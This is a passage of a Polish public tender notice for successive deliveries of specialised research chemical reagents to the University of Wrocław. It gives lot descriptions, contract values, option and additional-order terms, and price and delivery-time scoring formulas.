80%;<br/>Kryterium 2: Termin realizacji dostawy zamawianych odczynników w ramach zamówienia podstawowego i opcjonalnego (T) -20%<br/>Zamawiający dokona oceny ofert, przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>pkt.<br/>2. Łączna wartość punktowa oferty wyliczana będzie wg wzoru:<br/>W = C+ T<br/>gdzie:<br/>W –oznacza sumę punktów za wszystkie kryteria przyznane badanej ofercie;<br/>C - oznacza wartość punktową w kryterium Cena;<br/>T- oznacza wartość punktową w kryterium Termin realizacji dostawy’<br/>Maksymalna łączna ilość punktów, jaką może otrzymać oferta Wykonawcy wynosi 100 pkt.<br/>Sposób obliczania wartości punktowej według ww. kryteriów:<br/>2.1. Cena (C):<br/>Zamawiający dokona oceny ofert w kryterium „cena” w następujący sposób:<br/>Oferta z najniższą ceną (brutto) otrzyma maksymalną liczbę punktów – 80 pkt,<br/>a punkty dla pozostałych ofert zostaną wyliczone według wzoru:<br/>C = (Cmin/Cn) x 80<br/>gdzie:<br/>Cmin– [PLN] cena ofertowa brutto - najniższa wśród ocenianych ofert;<br/>Cn– [PLN] cena ofertowa brutto - ocenianej oferty;<br/>80 -współczynnik wynikający z przyjętej wagi za dane kryterium.<br/>2.2. Termin realizacji dostawy zamawianych odczynników w ramach zamówień podstawowych i opcjonalnych (T)<br/>Wartość punktowa T, w kryterium Termin realizacji dostawy, wyliczana będzie według wzoru:<br/>T = Tmin/Tn x 20<br/>gdzie:<br/>Tmin – termin realizacji dostawy – najkrótszy wśród ocenianych ofert;<br/>Tn – termin realizacji dostawy - ocenianej oferty,<br/>20 -współczynnik wynikający z przyjętej wagi za dane kryterium.<br/>Maksymalna ilość punktów możliwa do przydzielenia w obrębie tego kryterium to 20 pkt.<br/>2.2.1 Termin realizacji dostawy tj.: wykonanie dostawy zamawianych odczynników zgodnie z § 3 ust. 8 lit. a) projektowanych<br/>postanowień umowy (Załącznik nr 4 do SWZ), określony w Formularzu oferty (Załącznik nr 1 do SWZ), Wykonawca musi podać w<br/>pełnych dniach.<br/>2.2.2 Wykonawca ma obowiązek zaoferować przynajmniej maksymalny termin realizacji dostawy przedmiotu zamówienia<br/>oczekiwany przez Zamawiającego, czyli do 14 dni kalendarzowych, licząc od dnia złożenia zamówienia, o którym mowa w § 3 ust. 6<br/>projektowanych postanowień umowy.<br/>2.2.3 Minimalny punktowany termin realizacji dostawy przedmiotu zamówienia wynosi 7 dni kalendarzowych, licząc od dnia złożenia zamówienia. Jeżeli Wykonawca wskaże w ofercie krótszy termin dostawy niż 7 dni kalendarzowych do porównania i oceny ofert<br/>Zamawiający przyjmie wartość 7 dni kalendarzowych, natomiast do umowy zostanie przyjęty termin dostawy zgodnie z ofertą<br/>Wykonawcy.<br/>2.2.4 Jeżeli Wykonawca wskaże w ofercie dłuższy termin wykonania zamówienia niż 14 dni kalendarzowych, licząc od dnia zawarcia<br/>umowy, jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) uPzp.<br/>2.2.5 Brak podania Formularzu oferty terminu wykonania zamówienia oznaczać będzie, że Wykonawca zaoferuje wymagany przez<br/>Zamawiającego podstawowy termin wynoszący 14 kalendarzowe, licząc od dnia złożenia zamówienia.<br/>2.2.6 Wykonawca zobowiązany jest w Formularzu oferty podać pełne dni kalendarzowe (np. 10 dni, 7 dni). Jeśli Wykonawca poda<br/>niepełne dni kalendarzowe Zamawiający zaokrągla w górę i przyjmuje wyższą wartość do oceny (np. jeśli Wykonawca wskaże<br/>wykonanie: 10,5 dnia Zamawiający zaokrągla tę wartość do 11 dni).<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższą liczba punktów.<br/>4. Zamawiający oceni i porówna oferty niepodlegające odrzuceniu, złożone przez Wykonawców niepodlegających wykluczeniu z<br/>niniejszego postępowania.<br/>5. Wartości C, będą wyliczane z dokładnością do dwóch miejsc po przecinku, wg zasady, że trzecia cyfra po przecinku od 5 w górę<br/>powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeżeli trzecia cyfra po przecinku jest niższa od 5, to druga cyfra po<br/>przecinku nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy zamawianych odczynników w ramach zamówień podstawowych i opcjonalnych (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Rodzaj zamówienia: dostawa.<br/>2.	Przedmiotem zamówienia jest sukcesywna dostawa odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych na potrzeby jednostek Uniwersytetu Wrocławskiego z podziałem na następujące Zadania:<br/>Zadanie nr 2: Ilość pozycji: 1-108<br/>1)	których szczegółowy opis znajduje się w Załączniku nr 3 do SWZ – Arkusz kalkulacyjny - Opis przedmiotu zamówienia (OPZ) dla Zadania nr 2,<br/>2)	innych odczynników niż opisane w Arkuszu Kalkulacyjnym - OPZ należących do grupy odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych – zgodnie z bieżącym zapotrzebowaniem Zamawiającego, do kwoty określonej w Załączniku nr 3.<br/>3.	Szczegółowy zakres obowiązków wykonania przedmiotu zamówienia znajduje się we wzorze umowy (który stanowi projektowane postanowienia umowy w rozumieniu art. 281 ust. 1 pkt 7 uPzp), stanowiącym Załącznik nr 4 do SWZ.<br/>4.	Realizacja zamówienia ma odbywać się z należytą starannością i zgodnie ze wszystkimi wymogami zawartymi w SWZ z załącznikami i ewentualnymi Informacjami dla Wykonawców.<br/>Wykonawca na etapie realizacji zamówienia, wykonuje przedmiot zamówienia zgodnie <br/>z wymogami Zamawiającego. <br/>5.	Oferta na dane Zadanie musi być jednoznaczna i kompleksowa tj. obejmować cały asortyment przedmiotu zamówienia w danym Zadaniu. Wykonawca zobowiązany jest do złożenia oferty, której treść pozwoli Zamawiającemu na zweryfikowanie oferty pod względem jej zgodności z treścią SWZ. Treść oferty Wykonawcy musi odpowiadać treści specyfikacji warunków zamówienia. Tym samym Wykonawca zobowiązany jest do wypełnienia Arkusza kalkulacyjnego - Opisu przedmiotu zamówienia – stanowiącego Załącznik nr 3 do SWZ odpowiednio dla danego Zadania, poprzez dokładne określenie numeru katalogowego producenta i nazwy producenta oferowanego odczynnika oraz wskazanie ceny zgodnie z wymaganiami. Podane ilości w Arkuszu Kalkulacyjnym są poglądowe i służą do podania ceny jednostkowej przez Wykonawcę niezbędnej do rozliczenia umowy, a także do wyliczenia ceny ofertowej w Formularzu Ofertowym dla danego Zadania. <br/>6.Przedmiot zamówienia musi być fabrycznie nowy, nieużywany, nieuszkodzony, niepowystawowy, wolny od wad fizycznych i prawnych, nie może być przedmiotem praw osób trzecich, a także ma pochodzić z bieżącej produkcji.<br/>7.Przedmiot zamówienia musi spełniać wszystkie obowiązujące normy prawne bezpieczeństwa przepisów polskich i Unii Europejskiej, posiadać wszelkie wymagane prawem dopuszczenia i atesty oraz oznakowania zgodnie z obowiązującymi przepisami oraz ma zostać dostarczony w opakowaniu zabezpieczającym.<br/>8.Miejsce dostawy: Jednostki/komórki organizacyjne Uniwersytetu Wrocławskiego znajdujące się na terenie miasta Wrocław. Zamawiający w składanym zamówieniu, o którym mowa w § 3 ust. 6 projektowanych postanowień umowy wskazuje adres miejsca dostawy. <br/>9.Gwarancja i rękojmia:<br/>Szczegóły dotyczące gwarancji i rękojmi zostały określone w projektowanych postanowieniach umowy, które stanowią załącznik nr 4 do SWZ.<br/>10. Termin realizacji umowy: dostawy następować będą partiami, sukcesywnie i stosownie do potrzeb Zamawiającego, na zasadach określonych w umowie, przez okres 12 miesięcy od dnia zawarcia umowy („Pierwotny termin obowiązywania umowy”) lub do wyczerpania kwoty całkowitego maksymalnego wynagrodzenia, o której mowa w § 2 ust. 1 umowy, jeżeli nastąpi to przed upływem terminu, na jaki umowa została zawarta. W przypadku niewyczerpania całkowitej wartości umowy brutto (wartości zamówienia dodatkowego, zamówienia podstawowego, zamówienia opcjonalnego) w Pierwotnym terminie obowiązywania umowy, termin ten może ulec wydłużeniu maksymalnie do 12 miesięcy na podstawie § 10 ust. 1 pkt 1.2 umowy. <br/>11. Termin realizacji poszczególnych zamówień podstawowych i opcjonalnych dla Zadania nr 2 , nie może być dłuższy niż: do 14 dni kalendarzowych od dnia złożenia zamówienia przez Zamawiającego do Wykonawcy. <br/>12.	Termin realizacji poszczególnych zamówień dodatkowych w ramach Zadania nr 2 będzie uzgadniany indywidualnie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 142880,09 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696300-8 - Odczynniki chemiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> PRAWO OPCJI DLA ZAD. 2<br/>MAKSYMALNA WARTOŚĆ OPCJI: 46 090,45 zł netto, tj. 56 691,25 zł brutto<br/>1) Zamawiającemu przysługuje prawo opcji polegające na zwiększeniu ilości zamawianego asortymentu do 50 % wartości<br/>wynagrodzenia podstawowego brutto, o którym mowa w § 2 ust. 2 pkt 2.1 umowy, w zależności od potrzeb i posiadanych<br/>środków finansowych przez Zamawiającego. Zamawiający będzie mógł skorzystać z prawa opcji po wyczerpaniu wartości<br/>umowy za wykonanie zamówienia podstawowego, o którym mowa w § 2 pkt 2.1 umowy. Skorzystanie przez Zamawiającego<br/>z prawa opcji jest możliwe zarówno w okresie trwania umowy wskazanym w § 3 ust. 1 zdanie pierwsze („Pierwotny termin<br/>obowiązywania umowy”), jak również po jej przedłużeniu na podstawie § 10 ust. 1 pkt. 1.2 umowy.<br/>2) Wynagrodzenie opcjonalne Wykonawcy zależeć będzie od ilości faktycznie zakupionego przedmiotu zamówienia,<br/>zgodnie z przyjętym sposobem realizacji przedmiotu zamówienia w ramach prawa opcji.<br/>3) Jako podstawę rozliczania realizacji przedmiotu zamówienia w ramach prawa opcji przyjmuje się ceny jednostkowe<br/>poszczególnego asortymentu podane przez Wykonawcę w Ofercie – Arkusz kalkulacyjny (Załącznik nr 3 do SWZ), które<br/>obowiązują przez cały okres wykonywania umowy i nie mogą wzrosnąć w okresie jej wykonywania z zastrzeżeniem § 10 ust. 7 i 16 Umowy.<br/><br/>ZAMÓWIENIE ODCZYNNIKÓW DODATKOWYCH DLA ZAD. 2<br/>Maksymalna wartość zamówienia dodatkowego:<br/>4 609,04 zł netto, tj. 5 669,12 zł brutto:<br/>1) Zamawiającemu przysługuje prawo do zakupu odczynników dodatkowych opisanych w § 1 ust. 2 umowy, do kwoty wartości wynagrodzenia dodatkowego brutto, o którym mowa w § 2 ust. 2 pkt 2.3 umowy (tj. kwoty wskazanej w Tabeli zatytułowanej Podsumowanie w poz. F „Arkusza Kalkulacyjnego), w zależności od potrzeb i posiadanych środków<br/>finansowych przez Zamawiającego. Skorzystanie przez Zamawiającego z zamówień dodatkowych jest możliwe zarówno w<br/>okresie trwania umowy wskazanym w § 3 ust. 1 zdanie pierwsze umowy („Pierwotny termin obowiązywania umowy”), jak<br/>również po jej przedłużeniu na podstawie § 10 ust. 1 pkt. 1.2 umowy.<br/>2) Wynagrodzenie dodatkowe Wykonawcy zależeć będzie od ilości faktycznie zakupionych odczynników, opisanych w § 1<br/>ust. 2 umowy, zgodnie z przyjętym sposobem realizacji przedmiotu zamówienia w ramach zamówień dodatkowych.<br/>3) Jako podstawę rozliczania realizacji przedmiotu zamówienia w ramach zamówień dodatkowych przyjmuje się ceny<br/>jednostkowe poszczególnego asortymentu wskazane w zamówieniu dodatkowym, sporządzonym przez Zamawiającego, na<br/>podstawie cen podanych przez Wykonawcę w odpowiedzi na zapytanie o dany odczynnik – zgodnie z trybem właściwym dla<br/>zamówień dodatkowych opisanym w § 3 ust. 10 -12 umowy.<br/><br/>SZCZEGÓŁÓWE UREGULOWANIA DOT. PRAWA OPCJI ORAZ ZAMÓWIEŃ DODATKOWYCH znajdują się we wzorze<br/>umowy stanowiącym zał. nr 4 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>Kryterium 1: Cena (C)– 80%;<br/>Kryterium 2: Termin realizacji dostawy zamawianych odczynników w ramach zamówienia podstawowego i opcjonalnego (T) -20%<br/>Zamawiający dokona oceny ofert, przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>pkt.<br/>2. Łączna wartość punktowa oferty wyliczana będzie wg wzoru:<br/>W = C+ T<br/>gdzie:<br/>W –oznacza sumę punktów za wszystkie kryteria przyznane badanej ofercie;<br/>C - oznacza wartość punktową w kryterium Cena;<br/>T- oznacza wartość punktową w kryterium Termin realizacji dostawy’<br/>Maksymalna łączna ilość punktów, jaką może otrzymać oferta Wykonawcy wynosi 100 pkt.<br/>Sposób obliczania wartości punktowej według ww. kryteriów:<br/>2.1. Cena (C):<br/>Zamawiający dokona oceny ofert w kryterium „cena” w następujący sposób:<br/>Oferta z najniższą ceną (brutto) otrzyma maksymalną liczbę punktów – 80 pkt,<br/>a punkty dla pozostałych ofert zostaną wyliczone według wzoru:<br/>C = (Cmin/Cn) x 80<br/>gdzie:<br/>Cmin– [PLN] cena ofertowa brutto - najniższa wśród ocenianych ofert;<br/>Cn– [PLN] cena ofertowa brutto - ocenianej oferty;<br/>80 -współczynnik wynikający z przyjętej wagi za dane kryterium.<br/>2.2. Termin realizacji dostawy zamawianych odczynników w ramach zamówień podstawowych i opcjonalnych (T)<br/>Wartość punktowa T, w kryterium Termin realizacji dostawy, wyliczana będzie według wzoru:<br/>T = Tmin/Tn x 20<br/>gdzie:<br/>Tmin – termin realizacji dostawy – najkrótszy wśród ocenianych ofert;<br/>Tn – termin realizacji dostawy - ocenianej oferty,<br/>20 -współczynnik wynikający z przyjętej wagi za dane kryterium.<br/>Maksymalna ilość punktów możliwa do przydzielenia w obrębie tego kryterium to 20 pkt.<br/>2.2.1 Termin realizacji dostawy tj.: wykonanie dostawy zamawianych odczynników zgodnie z § 3 ust. 8 lit. a) projektowanych<br/>postanowień umowy (Załącznik nr 4 do SWZ), określony w Formularzu oferty (Załącznik nr 1 do SWZ), Wykonawca musi podać w<br/>pełnych dniach.<br/>2.2.2 Wykonawca ma obowiązek zaoferować przynajmniej maksymalny termin realizacji dostawy przedmiotu zamówienia<br/>oczekiwany przez Zamawiającego, czyli do 14 dni kalendarzowych, licząc od dnia złożenia zamówienia, o którym mowa w § 3 ust. 6<br/>projektowanych postanowień umowy.<br/>2.2.3 Minimalny punktowany termin realizacji dostawy przedmiotu zamówienia wynosi 7 dni kalendarzowych, licząc od dnia złożenia zamówienia. Jeżeli Wykonawca wskaże w ofercie krótszy termin dostawy niż 7 dni kalendarzowych do porównania i oceny ofert<br/>Zamawiający przyjmie wartość 7 dni kalendarzowych, natomiast do umowy zostanie przyjęty termin dostawy zgodnie z ofertą<br/>Wykonawcy.<br/>2.2.4 Jeżeli Wykonawca wskaże w ofercie dłuższy termin wykonania zamówienia niż 14 dni kalendarzowych, licząc od dnia zawarcia<br/>umowy, jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) uPzp.<br/>2.2.5 Brak podania Formularzu oferty terminu wykonania zamówienia oznaczać będzie, że Wykonawca zaoferuje wymagany przez<br/>Zamawiającego podstawowy termin wynoszący 14 kalendarzowe, licząc od dnia złożenia zamówienia.<br/>2.2.6 Wykonawca zobowiązany jest w Formularzu oferty podać pełne dni kalendarzowe (np. 10 dni, 7 dni). Jeśli Wykonawca poda<br/>niepełne dni kalendarzowe Zamawiający zaokrągla w górę i przyjmuje wyższą wartość do oceny (np. jeśli Wykonawca wskaże<br/>wykonanie: 10,5 dnia Zamawiający zaokrągla tę wartość do 11 dni).<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższą liczba punktów.<br/>4. Zamawiający oceni i porówna oferty niepodlegające odrzuceniu, złożone przez Wykonawców niepodlegających wykluczeniu z<br/>niniejszego postępowania.<br/>5. Wartości C, będą wyliczane z dokładnością do dwóch miejsc po przecinku, wg zasady, że trzecia cyfra po przecinku od 5 w górę<br/>powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeżeli trzecia cyfra po przecinku jest niższa od 5, to druga cyfra po<br/>przecinku nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy zamawianych odczynników w ramach zamówień podstawowych i opcjonalnych (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Rodzaj zamówienia: dostawa.<br/>2.	Przedmiotem zamówienia jest sukcesywna dostawa odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych na potrzeby jednostek Uniwersytetu Wrocławskiego z podziałem na następujące Zadania:<br/>Zadanie nr 3: Ilość pozycji: 1- 38<br/>1)	których szczegółowy opis znajduje się w Załączniku nr 3 do SWZ – Arkusz kalkulacyjny - Opis przedmiotu zamówienia (OPZ) dla Zadania nr 3,<br/>2)	innych odczynników niż opisane w Arkuszu Kalkulacyjnym - OPZ należących do grupy odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych – zgodnie z bieżącym zapotrzebowaniem Zamawiającego, do kwoty określonej w Załączniku nr 3.<br/><br/>3.	Szczegółowy zakres obowiązków wykonania przedmiotu zamówienia znajduje się we wzorze umowy (który stanowi projektowane postanowienia umowy w rozumieniu art. 281 ust. 1 pkt 7 uPzp), stanowiącym Załącznik nr 4 do SWZ.<br/>4.	Realizacja zamówienia ma odbywać się z należytą starannością i zgodnie ze wszystkimi wymogami zawartymi w SWZ z załącznikami i ewentualnymi Informacjami dla Wykonawców.<br/>Wykonawca na etapie realizacji zamówienia, wykonuje przedmiot zamówienia zgodnie <br/>z wymogami Zamawiającego. <br/>5.	Oferta na dane Zadanie musi być jednoznaczna i kompleksowa tj. obejmować cały asortyment przedmiotu zamówienia w danym Zadaniu. Wykonawca zobowiązany jest do złożenia oferty, której treść pozwoli Zamawiającemu na zweryfikowanie oferty pod względem jej zgodności z treścią SWZ. Treść oferty Wykonawcy musi odpowiadać treści specyfikacji warunków zamówienia. Tym samym Wykonawca zobowiązany jest do wypełnienia Arkusza kalkulacyjnego - Opisu przedmiotu zamówienia – stanowiącego Załącznik nr 3 do SWZ odpowiednio dla danego Zadania, poprzez dokładne określenie numeru katalogowego producenta i nazwy producenta oferowanego odczynnika oraz wskazanie ceny zgodnie z wymaganiami. Podane ilości w Arkuszu Kalkulacyjnym są poglądowe i służą do podania ceny jednostkowej przez Wykonawcę niezbędnej do rozliczenia umowy, a także do wyliczenia ceny ofertowej w Formularzu Ofertowym dla danego Zadania. <br/>6.Przedmiot zamówienia musi być fabrycznie nowy, nieużywany, nieuszkodzony, niepowystawowy, wolny od wad fizycznych i prawnych, nie może być przedmiotem praw osób trzecich, a także ma pochodzić z bieżącej produkcji.<br/>7.Przedmiot zamówienia musi spełniać wszystkie obowiązujące normy prawne bezpieczeństwa przepisów polskich i Unii Europejskiej, posiadać wszelkie wymagane prawem dopuszczenia i atesty oraz oznakowania zgodnie z obowiązującymi przepisami oraz ma zostać dostarczony w opakowaniu zabezpieczającym.<br/>8.Miejsce dostawy: Jednostki/komórki organizacyjne Uniwersytetu Wrocławskiego znajdujące się na terenie miasta Wrocław. Zamawiający w składanym zamówieniu, o którym mowa w § 3 ust. 6 projektowanych postanowień umowy wskazuje adres miejsca dostawy. <br/>9.Gwarancja i rękojmia:<br/>Szczegóły dotyczące gwarancji i rękojmi zostały określone w projektowanych postanowieniach umowy, które stanowią załącznik nr 4 do SWZ.<br/>10. Termin realizacji umowy: dostawy następować będą partiami, sukcesywnie i stosownie do potrzeb Zamawiającego, na zasadach określonych w umowie, przez okres 12 miesięcy od dnia zawarcia umowy („Pierwotny termin obowiązywania umowy”) lub do wyczerpania kwoty całkowitego maksymalnego wynagrodzenia, o której mowa w § 2 ust. 1 umowy, jeżeli nastąpi to przed upływem terminu, na jaki umowa została zawarta. W przypadku niewyczerpania całkowitej wartości umowy brutto (wartości zamówienia dodatkowego, zamówienia podstawowego, zamówienia opcjonalnego) w Pierwotnym terminie obowiązywania umowy, termin ten może ulec wydłużeniu maksymalnie do 12 miesięcy na podstawie § 10 ust. 1 pkt 1.2 umowy. <br/>11. Termin realizacji poszczególnych zamówień podstawowych i opcjonalnych dla Zadania nr 3 , nie może być dłuższy niż: do 14 dni kalendarzowych od dnia złożenia zamówienia przez Zamawiającego do Wykonawcy. <br/>12.	Termin realizacji poszczególnych zamówień dodatkowych w ramach Zadania nr 3 będzie uzgadniany indywidualnie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 76196,87 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696300-8 - Odczynniki chemiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> PRAWO OPCJI DLA ZAD. 3<br/>MAKSYMALNA WARTOŚĆ OPCJI: 24 579,64 zł netto, tj. 30 232,96 zł brutto<br/>1) Zamawiającemu przysługuje prawo opcji polegające na zwiększeniu ilości zamawianego asortymentu do 50 % wartości<br/>wynagrodzenia podstawowego brutto, o którym mowa w § 2 ust. 2 pkt 2.1 umowy, w zależności od potrzeb i posiadanych<br/>środków finansowych przez Zamawiającego. Zamawiający będzie mógł skorzystać z prawa opcji po wyczerpaniu wartości<br/>umowy za wykonanie zamówienia podstawowego, o którym mowa w § 2 pkt 2.1 umowy. Skorzystanie przez Zamawiającego<br/>z prawa opcji jest możliwe zarówno w okresie trwania umowy wskazanym w § 3 ust. 1 zdanie pierwsze („Pierwotny termin<br/>obowiązywania umowy”), jak również po jej przedłużeniu na podstawie § 10 ust. 1 pkt. 1.2 umowy.<br/>2) Wynagrodzenie opcjonalne Wykonawcy zależeć będzie od ilości faktycznie zakupionego przedmiotu zamówienia,<br/>zgodnie z przyjętym sposobem realizacji przedmiotu zamówienia w ramach prawa opcji.<br/>3) Jako podstawę rozliczania realizacji przedmiotu zamówienia w ramach prawa opcji przyjmuje się ceny jednostkowe<br/>poszczególnego asortymentu podane przez Wykonawcę w Ofercie – Arkusz kalkulacyjny (Załącznik nr 3 do SWZ), które<br/>obowiązują przez cały okres wykonywania umowy i nie mogą wzrosnąć w okresie jej wykonywania z zastrzeżeniem § 10 ust. 7 i 16 Umowy.<br/><br/>ZAMÓWIENIE ODCZYNNIKÓW DODATKOWYCH DLA ZAD. 3<br/>Maksymalna wartość zamówienia dodatkowego:<br/>2457,96 zł netto, tj. 3023,30 zł brutto:<br/>1) Zamawiającemu przysługuje prawo do zakupu odczynników dodatkowych opisanych w § 1 ust. 2 umowy, do kwoty wartości wynagrodzenia dodatkowego brutto, o którym mowa w § 2 ust. 2 pkt 2.3 umowy (tj. kwoty wskazanej w Tabeli zatytułowanej Podsumowanie w poz. F „Arkusza Kalkulacyjnego), w zależności od potrzeb i posiadanych środków<br/>finansowych przez Zamawiającego. Skorzystanie przez Zamawiającego z zamówień dodatkowych jest możliwe zarówno w<br/>okresie trwania umowy wskazanym w § 3 ust. 1 zdanie pierwsze umowy („Pierwotny termin obowiązywania umowy”), jak<br/>również po jej przedłużeniu na podstawie § 10 ust. 1 pkt. 1.2 umowy.<br/>2) Wynagrodzenie dodatkowe Wykonawcy zależeć będzie od ilości faktycznie zakupionych odczynników, opisanych w § 1<br/>ust. 2 umowy, zgodnie z przyjętym sposobem realizacji przedmiotu zamówienia w ramach zamówień dodatkowych.<br/>3) Jako podstawę rozliczania realizacji przedmiotu zamówienia w ramach zamówień dodatkowych przyjmuje się ceny<br/>jednostkowe poszczególnego asortymentu wskazane w zamówieniu dodatkowym, sporządzonym przez Zamawiającego, na<br/>podstawie cen podanych przez Wykonawcę w odpowiedzi na zapytanie o dany odczynnik – zgodnie z trybem właściwym dla<br/>zamówień dodatkowych opisanym w § 3 ust. 10 -12 umowy.<br/><br/>SZCZEGÓŁÓWE UREGULOWANIA DOT. PRAWA OPCJI ORAZ ZAMÓWIEŃ DODATKOWYCH znajdują się we wzorze<br/>umowy stanowiącym zał. nr 4 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>Kryterium 1: Cena (C)– 80%;<br/>Kryterium 2: Termin realizacji dostawy zamawianych odczynników w ramach zamówienia podstawowego i opcjonalnego (T) -20%<br/>Zamawiający dokona oceny ofert, przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>pkt.<br/>2. Łączna wartość punktowa oferty wyliczana będzie wg wzoru:<br/>W = C+ T<br/>gdzie:<br/>W –oznacza sumę punktów za wszystkie kryteria przyznane badanej ofercie;<br/>C - oznacza wartość punktową w kryterium Cena;<br/>T- oznacza wartość punktową w kryterium Termin realizacji dostawy’<br/>Maksymalna łączna ilość punktów, jaką może otrzymać oferta Wykonawcy wynosi 100 pkt.<br/>Sposób obliczania wartości punktowej według ww. kryteriów:<br/>2.1. Cena (C):<br/>Zamawiający dokona oceny ofert w kryterium „cena” w następujący sposób:<br/>Oferta z najniższą ceną (brutto) otrzyma maksymalną liczbę punktów – 80 pkt,<br/>a punkty dla pozostałych ofert zostaną wyliczone według wzoru:<br/>C = (Cmin/Cn) x 80<br/>gdzie:<br/>Cmin– [PLN] cena ofertowa brutto - najniższa wśród ocenianych ofert;<br/>Cn– [PLN] cena ofertowa brutto - ocenianej oferty;<br/>80 -współczynnik wynikający z przyjętej wagi za dane kryterium.<br/>2.2. Termin realizacji dostawy zamawianych odczynników w ramach zamówień podstawowych i opcjonalnych (T)<br/>Wartość punktowa T, w kryterium Termin realizacji dostawy, wyliczana będzie według wzoru:<br/>T = Tmin/Tn x 20<br/>gdzie:<br/>Tmin – termin realizacji dostawy – najkrótszy wśród ocenianych ofert;<br/>Tn – termin realizacji dostawy - ocenianej oferty,<br/>20 -współczynnik wynikający z przyjętej wagi za dane kryterium.<br/>Maksymalna ilość punktów możliwa do przydzielenia w obrębie tego kryterium to 20 pkt.<br/>2.2.1 Termin realizacji dostawy tj.: wykonanie dostawy zamawianych odczynników zgodnie z § 3 ust. 8 lit. a) projektowanych<br/>postanowień umowy (Załącznik nr 4 do SWZ), określony w Formularzu oferty (Załącznik nr 1 do SWZ), Wykonawca musi podać w<br/>pełnych 